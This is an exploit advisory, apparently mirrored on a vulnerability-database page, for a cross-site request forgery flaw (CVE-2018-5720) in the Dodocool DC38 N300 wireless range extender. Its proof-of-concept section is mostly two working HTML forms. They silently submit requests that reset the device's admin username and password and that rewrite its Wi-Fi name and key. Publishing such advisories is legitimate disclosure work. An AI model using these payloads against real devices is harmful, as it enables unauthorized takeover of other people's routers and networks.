Lucene search
K

Dodocool DC38 N300 Cross Site Request Forgery

🗓️ 26 Jan 2018 00:00:00Reported by Raffaele SabatoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

An issue in DODOCOOL DC38 N300 allows CSRF attacks for unauthorized configuration modifications, posing a risk of changing usernames, passwords, and Wi-Fi settings

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Dodocool DC38 N300 - Cross-site Request Forgery Vulnerability
26 Jan 201800:00
zdt
CNVD
DODOCOOL DC38 3-in-1 N300 Mini Wireless Range Extend Cross-Site Request Forgery Vulnerability
2 Feb 201800:00
cnvd
CVE
CVE-2018-5720
29 Jan 201805:00
cve
Cvelist
CVE-2018-5720
29 Jan 201805:00
cvelist
Exploit DB
Dodocool DC38 N300 - Cross-site Request Forgery
26 Jan 201800:00
exploitdb
EUVD
EUVD-2018-17489
7 Oct 202500:30
euvd
exploitpack
Dodocool DC38 N300 - Cross-site Request Forgery
26 Jan 201800:00
exploitpack
NVD
CVE-2018-5720
29 Jan 201805:29
nvd
OSV
CVE-2018-5720
29 Jan 201805:29
osv
Prion
Cross site request forgery (csrf)
29 Jan 201805:29
prion
Rows per page
`# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery  
# Date: 17-01-2018  
# Exploit Authors: Raffaele Sabato  
# Contact: https://twitter.com/syrion89  
# Vendor: DODOCOOL  
# Vendor Homepage: www.dodocool.com  
# Version: RTN2-AW.GD.R3465.1.20161103  
# CVE: CVE-2018-5720  
  
I DESCRIPTION  
========================================================================  
  
An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range  
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery  
(CSRF) vulnerability allows remote attackers to hijack the authentication  
of users for requests that modify the configuration.  
This vulnerability may lead to username and/or password changing, Wi-Fi  
password changing, etc.  
  
II PROOF OF CONCEPT  
========================================================================  
  
## Change user username and password (test_username:test_password):  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.10.1/boafrm/formPasswordSetup"  
method="POST">  
<input type="hidden" name="submit-url"  
value="/setok.htm?bw=main.htm" />  
<input type="hidden" name="submit-value" value="" />  
<input type="hidden" name="username" value="test_username" />  
<input type="hidden" name="newpass" value="test_password" />  
<input type="hidden" name="confpass" value="test_password" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
## Change WiFi Configuration (WIFI_TEST:TestTest):  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.10.1/boafrm/formWlanSetupREP"  
method="POST">  
<input type="hidden" name="submit-url"  
value="/setok.htm?bw=wl_rep.htm" />  
<input type="hidden" name="submit-value" value="repset" />  
<input type="hidden" name="wl_onoff" value="0" />  
<input type="hidden"  
name="wps_clear_configure_by_reg" value="0" />  
<input type="hidden" name="wlProfileId" value="" />  
<input type="hidden" name="wl_mode" value="0" />  
<input type="hidden" name="wl_authType" value="auto" />  
<input type="hidden" name="wepEnabled" value="ON" />  
<input type="hidden" name="weplength" value="" />  
<input type="hidden" name="wepformat" value="" />  
<input type="hidden" name="wl_wpaAuth" value="psk" />  
<input type="hidden" name="wl_pskFormat" value="0" />  
<input type="hidden" name="wl_pskValue" value="TestTest" />  
<input type="hidden" name="wl_ssid" value="WIFI_TEST" />  
<input type="hidden" name="wl_Method" value="6" />  
<input type="hidden" name="wep_key" value="" />  
<input type="hidden" name="ciphersuite" value="tkip+aes" />  
<input type="hidden" name="ciphersuite" value="aes" />  
<input type="hidden" name="wpa2ciphersuite" value="tkip+aes" />  
<input type="hidden" name="wpa2ciphersuite" value="aes" />  
<input type="hidden" name="web_pskValue" value="TestTest" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jan 2018 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.00258
45